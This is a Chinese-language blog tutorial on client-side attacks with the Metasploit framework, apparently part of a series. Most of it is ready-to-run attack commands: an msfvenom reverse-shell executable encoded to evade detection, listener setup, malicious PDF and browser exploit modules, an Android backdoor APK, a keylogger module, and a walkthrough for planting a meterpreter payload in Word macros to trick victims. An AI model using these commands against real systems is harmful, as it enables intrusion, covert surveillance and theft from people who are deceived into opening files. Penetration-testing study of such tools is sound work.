Metasploit framework(七)——客戶端滲透

Metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報。這些功能包括智能開發,代碼審計,Web應用程序掃描,社會工程。團隊合作,在Metasploit和綜合報告提出了他們的發現。

 

在無法突破網絡邊界的情況下轉而攻擊客戶端有一些思路,如:
1、社會工程學攻擊
2、進而滲透線上業務網絡
3、透過含有漏洞利用代碼的WEB站點,即:利用客戶端漏洞
4、含有漏洞利用代碼的DOC、PDF等文檔
5、誘騙被害者執行Payload

 

思路舉例:

誘騙被害者執行Payload,先生成可執行程序:

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe 

將可執行程序發送到客戶端等待客戶端運行,同時本地msf偵聽開啓:

msfconsole -q
use exploit/multi/handler 
set payload windows/shell/reverse_tcp
set LHOST 1.1.1.1
set LPORT 4444
exploit


含有漏洞利用代碼的DOC、PDF等文檔,舉例:

(PDF閱讀器利用下面的客戶端程序的漏洞實現攻擊)
利用Acrobat Reader漏洞執行Payload
首先構造PDF文件:

 

exploit/windows/fileformat/adobe_utilprintf 
set payload meterpreter/reverse_tcp
set lhost
set lport
run

被攻擊者的電腦的閱讀器如果存在漏洞,那麼將被執行成功取得shell。
擴展:當取得meterpreter後,可以執行例如以下命令對目標的控制:

use priv 
run post/windows/capture/keylog_recorder (知道對方正在敲擊的鍵盤)

 


利用Flash插件漏洞執行payload(要對應相同的版本)
 

use exploit/multi/browser/adobe_flash_hacking_team_uaf 
use exploit/multi/browser/adobe_flash_opaque_background_uaf 


利用IE瀏覽器漏洞執行payload

use exploit/windows/browser/ms14_064_ole_code_execution


利用JRE漏洞執行payload
 

use exploit/multi/browser/java_jre17_driver_manager 
use exploit/multi/browser/java_jre17_jmxbean 
use exploit/multi/browser/java_jre17_reflection_types 


生成Android後門程序

use payload/android/meterpreter/reverse_tcp 
generate -f a.apk -p android -t raw

 

VBScript感染方式:
利用宏感染word、Excel文檔,從而繞過某些基於文件類型檢查的安全機制
先生成VBScript腳本:

msfvenom -a x86 --platform windows -p windows/ meterpreter/reverse_tcp LHOST=172.20.10.11 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe 

再在文檔中添加生成的payload:
:視圖---->宏---->創建
    payload第一部分粘入VBA代碼;
    payload第二部分(data)粘入word文檔正文;
最後Msf啓動偵聽

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp

只要被攻擊者點擊文檔,那麼就能夠取得shell。


 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章